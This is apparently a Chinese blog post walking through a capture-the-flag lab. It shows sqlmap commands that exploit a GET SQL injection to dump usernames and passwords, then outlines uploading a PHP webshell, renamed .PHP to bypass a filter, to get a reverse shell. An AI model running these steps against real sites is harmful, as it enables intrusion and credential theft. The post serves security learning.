-
CTF-sql注入(get)【简单易懂】
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
目录
环境配置
kali 192.168.20.128
靶机 192.168.20.131
链接:https://pan.baidu.com/s/1EgN_06ZB1rcKbD8RG6mpag
提取码:6pdq信息探测
探测敏感信息
尝试弱口令登录
漏洞扫描
web漏洞扫描器owasp-zap
扫描结果
漏洞利用
存在sql注入漏洞
sqlmap -u http://192.168.20.131/cat.php?id=3
获取数据库
sqlmap -u http://192.168.20.131/cat.php?id=3 --dbs
发现数据库名information_schame和photolog
获取数据库下的表名
sqlmap -u http://192.168.20.131/cat.php?id=3 -D "photolog" --tables
发现三个表名,categories,pictures,users 获取字段值
sqlmap -u http://192.168.20.131/cat.php?id=3 -D "photolog" -T "users" --columns
发现id,login,password等字段
获取用户名和密码
sqlmap -u http://192.168.20.131/cat.php?id=3 -D "photolog" -T "users" -C 'login,password' --dump
登录系统
上传shell反弹权限
生成webshell
制作webshell
使用exploit
上传shell.php
.php改为.PHP
打开PHP所在连接
监听反应
shell id
-
相关阅读:
ArrayList与顺序表
合规、高效,加快药企数字化转型,全新打造药企文档资源中心
九联UNT413A_S905L3A__AI语音_默认打开ADB_完美线刷固件包【可救砖】
有趣的 TCP 抢带宽行为
如何实现与FDA保持邮件通信安全加密?
嵌入式硬件中常见的100种硬件选型方式
【算法题】2525. 根据规则将箱子分类
多线程——信号量
cs224w(图机器学习)2021冬季课程学习笔记6
[C/C++]数据结构 链表OJ题:随机链表的复制
- 原文地址:https://blog.csdn.net/m0_63127854/article/details/126442673